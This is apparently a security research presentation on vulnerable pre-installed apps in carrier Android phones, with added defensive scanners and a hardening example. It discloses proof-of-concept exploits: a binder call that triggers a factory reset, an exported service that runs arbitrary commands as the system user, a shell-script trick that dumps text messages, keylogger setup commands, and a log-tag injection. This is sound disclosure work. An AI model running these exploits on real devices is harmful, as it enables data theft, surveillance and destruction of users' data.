Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
This document evaluates vulnerabilities found in various Android devices from major carriers in the US. Several issues were uncovered:
1) Pre-installed apps on many devices could write sensitive user data like text messages, call logs and IMEI/IMSI numbers to external storage or log files that could then be read by other apps.
2) Some devices allowed arbitrary command execution with system privileges or a programmatic factory reset without user interaction due to flaws in pre-installed apps.
3) Certain LG and Asus phones contained bugs where an app could lock the user out of their device or obtain the full system-wide logcat output.
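Added here as a worked example (not code from the paper or from Kryptowire): a small scanner, in the spirit of findings 1 and 3, that an analyst can run over a captured logcat or a file pulled from external storage to flag leaked IMEI/IMSI values, phone numbers and SMS bodies. The sample log lines and every identifier in them are constructed.

```python
import re

# Constructed logcat excerpt (not from the paper); every identifier below is synthetic.
# The IMEI is the commonly used test value and passes the Luhn check; the IMSI does not.
SAMPLE_LOGCAT = """\
03-11 10:22:01.123  1234  1234 D TelephonyInfo: imei=490154203237518 imsi=310150123456789
03-11 10:22:02.456  2345  2345 I SmsLogger: address=+15555550123 body=Your code is 8472
03-11 10:22:03.789  3456  3456 D Boot: ready, uptime_ms=123456789
"""

# Lookarounds stop a 10-digit window inside a 15-digit run from matching as a phone number.
FIFTEEN_DIGITS = re.compile(r"(?<!\d)\d{15}(?!\d)")
PHONE_NUMBER = re.compile(r"(?<!\d)\+?1?\d{10}(?!\d)")
SMS_BODY = re.compile(r"\bbody=(.*)$")


def luhn_valid(digits: str) -> bool:
    """Luhn checksum as used by IMEI (rightmost digit is the check digit)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify_15_digits(value: str) -> str:
    # An IMEI carries a Luhn check digit; an IMSI does not, so a 15-digit run that
    # fails Luhn is reported as an IMSI candidate. A genuine IMSI passes Luhn about
    # one time in ten, so "IMEI" hits still deserve a look in context.
    return "IMEI" if luhn_valid(value) else "IMSI_CANDIDATE"


def find_leaked_data(log_text: str) -> list:
    """Return (line_no, kind, value) for each sensitive item found in logcat text."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for m in FIFTEEN_DIGITS.finditer(line):
            findings.append((line_no, classify_15_digits(m.group()), m.group()))
        for m in PHONE_NUMBER.finditer(line):
            findings.append((line_no, "PHONE_NUMBER", m.group()))
        m = SMS_BODY.search(line)
        if m:
            findings.append((line_no, "SMS_BODY", m.group(1).strip()))
    return findings


if __name__ == "__main__":
    for line_no, kind, value in find_leaked_data(SAMPLE_LOGCAT):
        print(f"line {line_no}: {kind} -> {value}")
```

Any hit from a pre-installed app's tag is worth tracing back to the file or log sink it wrote to, since a world-readable location is exactly the condition the paper describes.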
1. Vulnerable Out of the Box:
An Evaluation of Android Carrier Devices
Ryan Johnson - Kryptowire
Angelos Stavrou - Kryptowire
This work was supported by the Department of Homeland Security (DHS) Science and Technology (S&T) via award to the Critical Infrastructure Resilience Institute (CIRI) Center of Excellence (COE) led by the University of Illinois at Urbana-Champaign (UIUC).
The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of DHS.
2. Why Look for Cyber Threats?
Aggressive data collection
– Exfiltration of sensitive user-data to China (Adups)
– Sensitive data collection (OnePlus 5)
Remote system compromise
– System compromise from insecure network
communications (Ragentek)
User data disclosure due to vendor modifications
– Samsung leaking log data (CVE-2017-7978)
– MediaTek leaking log data (CVE-2016-10135)
Local “root” privilege escalation
– Alcatel A30 (former Amazon Prime Exclusive Device)
– Leagoo P1
– Privileged EngineerMode app (OnePlus 5)
– Android 4.4 devices with a MediaTek chipset
3. Pre-installed Apps and Vendor OS Modification
Android devices contain a set of pre-installed apps
– May not be available on Google Play
– Some apps cannot be disabled
– Privileged platform apps
Pre-installed apps can be malicious and/or insecure
– Insecure apps can be locally or remotely exploited
– Malicious apps can provide “backdoor” functionality
and may exfiltrate sensitive user data
Vendors generally modify Google’s official Android
code to provide custom behavior
– (Un)intentionally expose sensitive capabilities
Source: https://developer.android.com/guide/platform/index.html
4. App Components
Fundamental functional blocks of an Android app
– Activity
– Broadcast Receiver
– Service
– Content Provider
Declared in the app’s manifest file
May provide entry points into an app that other apps can reach, and potentially exploit, by sending
intents, a message-like abstraction for communication within and between apps
– An intent carries Intent-specific fields (action, category, data, component) and potentially embedded data (extras)
5. Exported App Components
Exported components are accessible to any process on the device, unless the component is gated by a permission
– Regulated by the android:exported and android:permission app component attributes
Android exports a component by default if the component does not set the android:exported
attribute and declares at least one intent-filter
– For apps targeting Android 12 (API 31) and later, a component that declares an intent-filter must set
android:exported explicitly or the app fails to install, so the implicit case below only arises on older targets
<service android:name="com.asus.dm.installer.DMInstallerService">
<intent-filter>
<action android:name="com.asus.dm.installer.sync_apk_data"/>
<action android:name="com.asus.dm.installer.startService"/>
<action android:name="com.asus.dm.installer.download_app"/>
<action android:name="com.asus.dm.DMService.app_install_start"/>
<action android:name="com.asus.dm.DMService.app_install_result"/>
<action android:name="com.asus.dm.DMService.registerConnectivity"/>
<action android:name="com.asus.dm.installer.removeService"/>
</intent-filter>
</service>
DMInstallerService
will be exported by default
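The exported-by-default rule above is easy to check mechanically. The script below is an added example, not code from the slides or from Kryptowire: it applies the rule to a decoded AndroidManifest.xml (a binary manifest first needs apktool or aapt2 to dump it as text, which is assumed to have been done) and reports every reachable component that is not gated by android:permission. The manifest embedded in the script is constructed for the example from the DMInstallerService fragment above plus a hypothetical receiver and two hypothetical private components; the provider rule (exported unless targetSdkVersion is 17 or higher) is Android platform behaviour rather than something the slide states.

```python
"""Added example: flag app components Android exports implicitly.

Rule applied (pre-Android-12 targets):
  * android:exported set explicitly -> that value wins
  * otherwise a component with at least one <intent-filter> is exported
  * a <provider> without android:exported is exported when targetSdkVersion < 17
Exported components with no android:permission are the ones any co-located
app can reach, so those are the findings worth triaging first.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample: the DMInstallerService fragment from the slide plus
# hypothetical components added to exercise each branch of the rule.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.asus.dm">
  <uses-sdk android:targetSdkVersion="25"/>
  <application>
    <service android:name="com.asus.dm.installer.DMInstallerService">
      <intent-filter>
        <action android:name="com.asus.dm.installer.download_app"/>
      </intent-filter>
    </service>
    <receiver android:name=".HypotheticalReceiver" android:exported="true"
              android:permission="android.permission.MASTER_CLEAR"/>
    <activity android:name=".HiddenActivity" android:exported="false"/>
    <service android:name=".PrivateService"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component, target_sdk):
    """Apply the explicit-attribute / intent-filter / provider rule."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return target_sdk < 17
    return component.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return one dict per exported component, noting whether the export was implicit."""
    root = ET.fromstring(xml_text)
    target_sdk = 1
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is not None and _attr(uses_sdk, "targetSdkVersion"):
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion"))
    findings = []
    for comp in root.find("application"):
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp, target_sdk):
            continue
        findings.append({
            "component": _attr(comp, "name"),
            "kind": comp.tag,
            "implicit": _attr(comp, "exported") is None,
            "permission": _attr(comp, "permission"),
        })
    return findings


def unprotected_exports(xml_text):
    """Names of exported components any zero-permission app can bind to or start."""
    return [f["component"] for f in audit_manifest(xml_text) if f["permission"] is None]


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
    print("reachable without a permission:", unprotected_exports(SAMPLE_MANIFEST))
```

Run over a decoded manifest, only DMInstallerService is reported as reachable without a permission; the receiver is exported but requires a permission the attacker does not hold, and the two private components never appear. Exported-and-unprotected is the trigger for a closer look at what the component actually does, not a vulnerability by itself.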
6. Threat Model
A low-privilege third-party app is installed on the device via app repackaging, phishing,
remote exploit, etc.
– Possibly, the READ_EXTERNAL_STORAGE permission is needed
– A malicious app without malicious permissions
7. Android Devices on US Carriers - Vulnerabilities
ZTE Blade Spark (sold by AT&T)
– Write modem and logcat logs to external storage
LG Phoenix 2 (sold by AT&T)
– Write logcat logs to app’s private directory
– Lock user out of their device
Asus ZenFone V Live (sold by Verizon)
– Command execution as system user
– Take and write screenshot to external storage
ZTE Blade Vantage (sold by Verizon)
– Write modem and logcat logs to external storage
Essential Phone (sold by Sprint)
– Programmatic factory reset
Coolpad Defiant (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
T-Mobile Revvl Plus (Coolpad) (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
ZTE ZMAX Pro (sold by T-Mobile)
– Send, read, and modify text messages
– Programmatic factory reset
– Obtain phone numbers of contacts
– Write modem and logcat log to external storage
LG G6 (sold by Multiple Carriers)
– Lock user out of their device
– Get logcat log and kernel logs
ZTE ZMAX Champ (sold by Total Wireless)
– Write modem and logcat logs to external storage
– Programmatic factory reset
– Make device continually crash in recovery mode
8. ZTE – Modem Log and Logcat Log
Vulnerability allows any app to access text messages, call data, and logcat logs
– Can be activated by any app on the device
– Transparent to the user (no notifications, toast messages, etc.)
Writes to a base directory of /sdcard/sd_logs
– Modem log stored in qmdl format and logcat log in plaintext
Present in all the ZTE devices we examined
– ZTE Blade Spark, ZTE Blade Vantage, ZTE ZMAX Pro, ZTE ZMAX Champ
Source: https://www.amazon.com/Unlocked-Fingerprint-Reader-Z971-Desbloqueado/dp/B0748Z1VJ3
9. Sample Data Leaked Through Logcat
Data written to the logcat log by any process
– Login credentials, tokens, etc.
Body of sent and received text messages
Phone number of received and placed calls
GPS Coordinates
Email Addresses
Telephone number
Cell Tower ID
MAC Address
Serial Number
IMEI
IMSI
URLs
10. Exposing User Data Through Logcat Logs
Third-party Android apps cannot read the system-wide
logcat log since Android 4.1 due to it containing sensitive
user data
– Can only read the log messages they write
– System-wide log requires READ_LOGS permission
Pre-installed apps can expose log data to other apps
– Generally written to external storage (SD card),
although an app’s private directory is also possible
Any app with the READ_EXTERNAL_STORAGE
permission can read from external storage
(i.e., SD card)
– Contains the user’s pictures, downloads, and arbitrary files
Device Carrier
ZTE Blade Spark AT&T
ZTE Blade Vantage Verizon
ZTE ZMAX Pro T-Mobile
ZTE ZMAX Champ Total Wireless
LG G6 Multiple Carriers
LG Phoenix 2 AT&T
Vivo V7 Unlocked
LG X Power Unlocked
LG Q6 Unlocked
Asus ZenFone 3 Max Unlocked
Orbic Wonder Unlocked
14. LG Vulnerabilities
Obtain system-wide logcat log in attacking app’s private directory
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
– Generally written to SD card, but using path traversal it
can be written in the attacking app’s private directory
Lock user out of their device
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
– Can only make emergency calls
Dump a hidden database that contains logcat and kernel
logs to external storage
– Affects LG G6, LG Q6
Source: https://www.amazon.com/LG-G6-32-GB-Unlocked-Exclusive/dp/B07D2JL7TS
15. LG – Read System-wide Logcat Log Via Command
Line Argument Injection
Default command the com.lge.gnsslogcat app executes is logcat -v threadtime
-s GpsLocationProvider:V LocationManagerService:V GnssLogService:V
By default it writes the logs to /storage/emulated/0/gnsslog, but the output path is vulnerable to
path traversal and can be made to point into the attacking app’s private directory (file permission
changes on that directory are needed so the logging app can write there)
App allows additional log tags to be supplied via intent; each tag gets :V appended and is added to
the end of the logcat command without validation, so a “tag” of *:V Hidden smuggles in a second filterspec
Command line argument injection changes the command to logcat -v threadtime -s
GpsLocationProvider:V LocationManagerService:V GnssLogService:V *:V
Hidden:V, and the injected *:V makes every tag verbose, so the entire system-wide log is captured
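The two flaws on this slide, an unvalidated tag appended to a shell command line and an unconfined output path, are shown below as an added example, not code from the slides or from LG's app, with the vulnerable construction beside a hardened one. Function names, the tag allow-list pattern and the sample inputs are mine; only the base logcat arguments and the gnsslog directory come from the slide. The hardened version builds an argv list instead of a shell string, rejects any tag that is not a plain identifier, and refuses any output path that normalises to a location outside the intended directory.

```python
"""Added example: argument injection and path traversal, vulnerable vs. hardened."""
import posixpath
import shlex
import re

# From the slide: the command com.lge.gnsslogcat runs and its default output directory.
BASE_CMD = ["logcat", "-v", "threadtime", "-s",
            "GpsLocationProvider:V", "LocationManagerService:V", "GnssLogService:V"]
LOG_DIR = "/storage/emulated/0/gnsslog"

# Assumed allow-list for a log tag: letters, digits, '_' and '.', no spaces,
# no '*' and no ':' so a caller cannot smuggle a second filterspec in.
TAG_RE = re.compile(r"^[A-Za-z0-9_.]{1,23}$")


def vulnerable_command(extra_tags):
    """One shell string built by concatenation, the pattern the slide describes.
    A tag of '*:V Hidden' becomes '... *:V Hidden:V' and enables every tag."""
    cmd = " ".join(BASE_CMD)
    for tag in extra_tags:
        cmd += " " + tag + ":V"
    return cmd


def injected_argv(extra_tags):
    """What a shell would actually hand to logcat for the vulnerable string."""
    return shlex.split(vulnerable_command(extra_tags))


def is_safe_tag(tag):
    return TAG_RE.match(tag) is not None


def hardened_command(extra_tags):
    """argv list (never passed through a shell) plus a strict per-tag allow-list."""
    argv = list(BASE_CMD)
    for tag in extra_tags:
        if not is_safe_tag(tag):
            raise ValueError("rejected log tag: %r" % (tag,))
        argv.append(tag + ":V")
    return argv


def vulnerable_output_path(user_supplied):
    """Joins without checking; '../' components walk out of LOG_DIR."""
    return posixpath.join(LOG_DIR, user_supplied)


def resolved_vulnerable_path(user_supplied):
    """Where the vulnerable join really ends up once the kernel resolves '..'."""
    return posixpath.normpath(vulnerable_output_path(user_supplied))


def hardened_output_path(user_supplied):
    """Normalise the joined path and insist it still lies under LOG_DIR."""
    candidate = posixpath.normpath(posixpath.join(LOG_DIR, user_supplied))
    if posixpath.commonpath([LOG_DIR, candidate]) != LOG_DIR:
        raise ValueError("output path escapes %s: %r" % (LOG_DIR, user_supplied))
    return candidate


def is_confined(user_supplied):
    try:
        hardened_output_path(user_supplied)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    hostile_tag = "*:V Hidden"                      # constructed attacker input
    traversal = "../../../../data/data/com.attacker/gnss.txt"
    print(vulnerable_command([hostile_tag]))
    print(injected_argv([hostile_tag]))
    print(resolved_vulnerable_path(traversal))
    print("tag accepted:", is_safe_tag(hostile_tag), "path confined:", is_confined(traversal))
```

The argv split is the instructive part: the "tag" arrives as two separate arguments, so the only robust fix is to validate each tag and never re-parse a string through a shell. The path check uses commonpath after normalisation rather than a prefix string compare, which would let /storage/emulated/0/gnsslog2/ pass.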
16. LG – Lock The User Out of Their Device
Screen lock is unresponsive except for making emergency calls
– Exported broadcast receiver in com.android.systemui app
• Writes two values to the system settings and locks the screen
– Screen lock is active in safe mode
– Can be used for a crypto-less ransomware
– Affects LG G6, LG Q6, LG X Power 2, and LG Phoenix 2
If ADB is enabled prior to the screen lock, a user can remove
the screen lock by sending a particular broadcast intent
– Otherwise, a factory reset is required to recover the device
17. Programmatic Factory Reset
A “factory reset” wipes all user data and
apps from the device
Facilitated by privileged pre-installed apps
– Requires a co-located zero-permission app
– Does not require any user intervention
User data and apps that are not backed up externally
are lost during a factory reset
Device Carrier
Essential Phone Sprint
Coolpad Defiant T-Mobile
T-Mobile Revvl Plus T-Mobile
ZTE ZMAX Champ Total Wireless
Leagoo Z5C Unlocked
Leagoo P1 Unlocked
Plum Compass Unlocked
Orbic Wonder Unlocked
MXQ TV Box 4.4.2 N/A
19. AndroidManifest.xml file of the com.asus.splendidcommandagent app
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:sharedUserId="android.uid.system"
package="com.asus.splendidcommandagent" platformBuildVersionCode="18" platformBuildVersionName="4.3.1-1425645">
<uses-permission android:name="android.permission.INTERACT_ACROSS_USERS"/>
<uses-permission android:name="android.permission.MANAGE_USERS"/>
<application android:icon="@drawable/ic_launcher" android:label="@string/app_name"
android:theme="@style/AppTheme">
<service android:exported="true" android:name=".SplendidCommandAgentService"
android:process="com.asus.services">
<intent-filter>
<action android:name="asus.splendid.intent.action.DO_COMMAND"/>
<action android:name="com.asus.splendidcommandagent.ISplendidCommandAgentService"/>
</intent-filter>
</service>
<service android:exported="true" android:name=".MonitorUserSwitchedService"
android:process="com.asus.services"/>
</application>
Asus ZenFone V Live – Command Execution as system User
20. Asus ZenFone V Live – Command Execution as system User
private void asus_zenfone_V_live_command_execution_as_system_user() {
Intent i = new Intent();
i.setClassName("com.asus.splendidcommandagent", "com.asus.splendidcommandagent.SplendidCommandAgentService");
SplendidServiceConnection servConn = new SplendidServiceConnection();
boolean ret = bindService(i, servConn, BIND_AUTO_CREATE);
Log.i(TAG, "initService() bound with " + ret);
}
class SplendidServiceConnection implements ServiceConnection {
public void onServiceConnected(ComponentName name, IBinder boundService) {
Log.i(TAG, "onserviceConnected");
Parcel send = Parcel.obtain();
Parcel reply = Parcel.obtain();
send.writeInterfaceToken("com.asus.splendidcommandagent.ISplendidCommandAgentService");
send.writeString("am broadcast -a android.intent.action.MASTER_CLEAR");
try {
boolean success = boundService.transact(1, send, reply, Binder.FLAG_ONEWAY);
Log.i(TAG, "binder transaction success=" + success);
} catch (RemoteException e) {
e.printStackTrace();
}
send.recycle();
reply.recycle();
}
public void onServiceDisconnected(ComponentName arg0) {
Log.i(TAG, "onServiceDisconnected");
}
}
Source: https://www.verizonwireless.com/smartphones/asus-zenfone-v-live/
21. system User Capabilities on Android 7.1.1
• Video Record Screen of the user
• Take screenshots
• Factory reset the device
• Use logcat to obtain system-wide logs
• Set a custom keyboard with keylogging
functionality
• Change settings configurations
• Register an app as a notification listener
to get the user’s notifications
• Enable/disable apps
• Invert the screen colors
• Call (emergency) phone numbers
• Set a custom spell checker
• Change certain system properties
• Inject clicks, swipes, and text events in
the GUI (emulate the user)
• Launch any app component that does
not have android:enabled attribute
set to false
• Read/modify user’s text messages
• Read/modify user’s call log
• Read/modify user’s contacts
22. Sample of Asus Android Devices – Command
Execution as system User
Device | Status | Build Fingerprint
Asus ZenFone V Live (Verizon) | Vulnerable | asus/VZW_ASUS_A009/ASUS_A009:7.1.1/NMF26F/14.0610.1802.78-20180313:user/release-keys
Asus ZenFone 3 Max | Vulnerable | asus/US_Phone/ASUS_X008_1:7.0/NRD90M/US_Phone-14.14.1711.92-20171208:user/release-keys
Asus ZenFone 3 Ultra | Vulnerable | asus/JP_Phone/ASUS_A001:7.0/NRD90M/14.1010.1711.64-20171228:user/release-keys
Asus ZenFone 4 Max | Vulnerable | asus/WW_Phone/ASUS_X00ID:7.1.1/NMF26F/14.2016.1803.232-20180301:user/release-keys
Asus ZenFone 4 Max Pro | Vulnerable | asus/WW_Phone/ASUS_X00ID:7.1.1/NMF26F/14.2016.1803.232-20180301:user/release-keys
Asus ZenFone 4 Selfie | Vulnerable | asus/WW_Phone/ASUS_X00LD_3:7.1.1/NMF26F/14.0400.1802.190-20180202:user/release-keys
Asus ZenFone Live | Vulnerable | asus/WW_Phone/zb501kl:6.0.1/MMB29P/13.1407.1801.57-20180307:user/release-keys
Asus ZenPad 10 | Vulnerable | asus/JP_P00C/P00C_2:7.0/NRD90M/JP_P00C-V5.3.20-20171229:user/release-keys
Asus ZenPad 3 8.0 | Vulnerable | asus/WW_P008/P008_1:7.0/NRD90M/WW_P008-V5.7.3-20180110:user/release-keys
Asus ZenPad S 8.0 | Not Vulnerable | asus/WW_P01M/P01M:6.0.1/MMB29P/WW_P01M-V5.6.0-20170608:user/release-keys
23. Asus ZenFone 3 (ZE552KL) – Timeline for the
Command Execution as system User Vulnerability
Target Market | Release Date | Status | Build Fingerprint
Japan | 05/21/18 | Vulnerable | asus/JP_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1804.60-0:user/release-keys
Worldwide | 05/16/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1804.60-0:user/release-keys
Worldwide | 05/03/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1803.55-0:user/release-keys
Worldwide | 04/19/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1803.53-0:user/release-keys
Japan | 04/19/18 | Vulnerable | asus/JP_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1803.52-0:user/release-keys
China | 03/23/18 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1801.197-20180302:user/release-keys
Worldwide | 03/14/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1802.44-0:user/release-keys
Worldwide | 02/12/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1801.40-0:user/release-keys
China | 02/12/18 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1801.196-20180108:user/release-keys
Worldwide | 01/29/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:8.0.0/OPR1.170623.026/15.0410.1801.40-0:user/release-keys
Japan | 01/11/18 | Vulnerable | asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1712.85-20171228:user/release-keys
Worldwide | 01/08/18 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1712.85-20171228:user/release-keys
Worldwide | 12/22/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1711.83-20171220:user/release-keys
Worldwide | 12/15/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1711.79-20171206:user/release-keys
Japan | 11/22/17 | Vulnerable | asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1711.75-20171115:user/release-keys
Worldwide | 11/21/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1711.75-20171115:user/release-keys
Worldwide | 10/13/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1709.68-20171003:user/release-keys
China | 09/06/17 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1706.184-20170817:user/release-keys
Japan | 08/08/17 | Vulnerable | asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1708.56-20170719:user/release-keys
Worldwide | 08/03/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1708.56-20170719:user/release-keys
China | 07/24/17 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1706.181-20170710:user/release-keys
Worldwide | 07/14/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1706.53-20170628:user/release-keys
Italy | 06/29/17 | Vulnerable | asus/TIM_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1704.41-20170526:user/release-keys
Japan | 05/17/17 | Vulnerable | asus/JP_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1703.33-20170424:user/release-keys
Worldwide | 04/21/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2020.1703.28-20170410:user/release-keys
China | 03/31/17 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1701.170-20170323:user/release-keys
Italy | 03/28/17 | Vulnerable | asus/TIM_Phone/ASUS_Z012D:7.0/NRD90M/14.2015.1701.13-20170310:user/release-keys
Worldwide | 03/08/17 | Vulnerable | asus/WW_Phone/ASUS_Z012D:7.0/NRD90M/14.2015.1701.8-20170222:user/release-keys
Japan | 02/24/17 | Not Vulnerable | asus/JP_Phone/ASUS_Z012D:6.0.1/MMB29P/13.2010.1612.161-20170205:user/release-keys
China | 01/09/17 | Not Vulnerable | asus/CN_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20.10.150-20161214:user/release-keys
Worldwide | 12/28/2016 | Not Vulnerable | asus/WW_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20.10.152-20161222:user/release-keys
Worldwide | 12/08/2016 | Not Vulnerable | asus/WW_Phone/ASUS_Z012D:6.0.1/MMB29P/13.20.10.140-20161117:user/release-keys
24. Oppo F5 (Non-US Carriers) – Command Execution as system User
@Override
public int onStartCommand(final Intent intent, int flags, int startId) {
new Thread() {
public void run() {
if (intent == null) {
stopSelf();
return;
}
String action = intent.getStringExtra("action");
if (action.isEmpty()) {
action = intent.getAction();
}
Log.i("DropboxChmodService", "action = [" + action + "]");
if (action.isEmpty()) {
stopSelf();
return;
}
try {
Process process = Runtime.getRuntime().exec(action);
Log.i("DropboxChmodService", "wait begin");
process.waitFor();
Log.i("DropboxChmodService", "wait end");
} catch (Exception e) {
e.printStackTrace();
}
}
}.start();
return super.onStartCommand(intent, flags, startId);
}
Oppo F5 (Non-US Carriers) – Command Execution as system User
com.dropboxchmod app exposes
this capability through an exported
service named DropboxChmodService
– Simple app containing only one class
with a single nested anonymous class
Recreated source code based on
the disassembled odex file
Intent i = new Intent();
i.setClassName("com.dropboxchmod",
"com.dropboxchmod.DropboxChmodService");
i.setAction("/system/bin/screenrecord --time-limit 60
/sdcard/notascreenrecording.mp4");
startService(i);
Source: https://www.flipkart.com/oppo-f5-red-64-gb/p/itmezq6rgu7uhcf4
25. Approach 1: Transfer Command Output Using a Broadcast Receiver
1. Choose log tag (e.g., UQ2h9hVRhLfg) and register a broadcast receiver with it as an action string
2. Write lines of the script with selected log tag to the logcat log from the attacking app
Log.d("UQ2h9hVRhLfg", "#!/bin/sh");
Log.d("UQ2h9hVRhLfg", "content query --uri content://sms >
/data/data/com.dropboxchmod/msg.txt");
Log.d("UQ2h9hVRhLfg", "am broadcast -a UQ2h9hVRhLfg -p <attacking app’s package name>"
        + " --es data \"$(cat /data/data/com.dropboxchmod/msg.txt)\"");
3. Make the vulnerable app execute commands so it writes the lines to a shell script and executes it
logcat -v raw -b main -s UQ2h9hVRhLfg:* *:S -f /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh -d
chmod 770 /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
sh /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
26. Approach 2: Transfer Command Output Using a File in App’s Directory
1. Choose log tag with high entropy (e.g., UQ2h9hVRhLfg)
2. Make attacking app’s private directory world-executable and create a globally writable and
readable file (msg.txt)
3. Write lines of the script with selected log tag to the log from the attacking app
Log.d("UQ2h9hVRhLfg", "#!/bin/sh");
Log.d("UQ2h9hVRhLfg", "content query --uri content://sms >
/data/data/com.attacking.app/msg.txt");
4. Make the vulnerable app execute commands so it writes the lines to a shell script and executes it
logcat -v raw -b main -s UQ2h9hVRhLfg:* *:S -f
/data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh -d
chmod 770 /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
sh /data/data/com.dropboxchmod/UQ2h9hVRhLfg.sh
27. Sample of Oppo Android Devices – Command
Execution as system User
Device Country Status Build Description
A77 China Vulnerable msm8953_64-user 7.1.1 NMF26F eng.root.20180609.153403 dev-keys
A59S China Vulnerable full_oppo6750_15131-user 5.1 LMY47I 1525865236 dev-keys
A57 Philippines Vulnerable msm8937_64-user 6.0.1 MMB29M eng.root.20180508.104025 release-keys
R11 China Vulnerable sdm660_64-user 7.1.1 NMF26X eng.root.20180426.130343 release-keys
F3 Plus Pakistan Vulnerable msm8952_64-user 6.0.1 MMB29M eng.root.20180413.004413 release-keys
A39 Australia Vulnerable full_oppo6750_16321-user 5.1 LMY47I 1520521221 release-keys
R9 China Vulnerable full_oppo6755_15111-user 5.1 LMY47I 1519426429 dev-keys
A77 Australia Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
F3 Vietnam Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
F3 Pakistan Vulnerable full_oppo6750_16391-user 6.0 MRA58K 1517824690 release-keys
R9 Australia Vulnerable full_oppo6755_15311-user 5.1 LMY47I 1516344361 release-keys
F5 Malaysia Vulnerable full_oppo6763_17031-user 7.1.1 N6F26Q 1516160348 release-keys
F1S Australia Vulnerable full_oppo6750_15331-user 5.1 LMY47I 1509712532 release-keys
A37 India Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20171008.172519 release-keys
R7 Plus India Not Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20160922.193102 dev-keys
Neo 5 Australia Not Vulnerable OPPO82_15066-user 4.4.2 KOT49H eng.root.1469846786 dev-key
R7S China Vulnerable msm8916_64-user 5.1.1 LMY47V eng.root.20160713.211744 dev-keys
R7 Plus China Not Vulnerable full_oppo6795_15019-user 5.0 LRX21M 1465722913 dev-keys
28. Setting Your App as the Default Keyboard for Some Keylogging
Have the attacking app implement an Input Method Editor (IME)
/system/bin/settings put secure enabled_input_methods <ones that were already
there>:com.my.app/.NotSomeKeyboardService
/system/bin/settings put secure default_input_method com.my.app/.NotSomeKeyboardService
The IME forwards captured key presses to the attacking app by sending a broadcast intent to a
dynamically-registered broadcast receiver
Can also set your app as the default spell checker
– Does not get the same amount of data as the “custom” keyboard
/system/bin/settings put secure selected_spell_checker com.my.app/.NotSomeSpellingService
30. Exposed Screenshot Capability
Certain vendors have modified the Android OS (system_server) to
export the screenshot capability to any app on the device
